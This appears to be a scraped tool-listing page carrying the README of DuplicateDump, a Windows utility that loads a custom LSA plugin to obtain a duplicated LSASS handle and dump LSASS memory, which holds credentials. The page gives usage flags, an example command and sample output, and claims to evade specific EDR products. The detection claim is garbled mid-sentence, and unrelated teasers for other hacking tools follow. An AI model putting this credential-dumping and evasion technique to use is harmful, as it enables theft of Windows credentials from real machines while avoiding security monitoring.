DuplicateDump is a fork of MirrorDump with following modifications:
DuplicateDump add custom LSA plugin that duplicate LSASS process handle from the LSASS process to DuplicateDump. So DuplicateDump has a ready to use process handle to LSASS without invoking OpenProcess.
By loading DuplicateDump in memory, it was able to dump LSASS memory without detection on
Detected by Cortex XDR, Crowdstrike. Failed to dump lsass without detection on SentinalOne.
Compile LSA plugin (export either SpLsaModeInitialize or dllMain function) and provide the full path of DLL to DuplicateDump
.\DuplicateDump.exe –help
-f, –filename=VALUE The path to write the dump file to
-p, –plugin=VALUE Full file path to LSA plugin
-c, –compress GZip and delete the dump file on disk
-d, –DebugPriv Obtain SeDebugPrivilege
-h, –help Display this help
.\DuplicateDump.exe -f test -c -p C:\LSAPlugin.dll
[+] Loading LSA security package
[+] Named pipe connected and replying with current PID 6492
[+] Found duplicated LSASS process handle 0x3d0
[+] Compressed dump file saved to test.gz
Burrow is an open source tool for burrowing through firewalls, built by teenagers at Hack Club.…
Simple golang webserver that listens for basic auth or post requests and sends a notification…
Nutek Security Platform for macOS and Linux operating systems. Tools for hackers, bug hunters and…
Welcome to SecureSphere Labs, your go-to destination for a curated collection of powerful hacking tools…
All in one Docker-based workstation with hacking tools for Pentesting and offsec Labs by maintained…
Got it! Below is the updated README.md file with instructions for downloading the project on…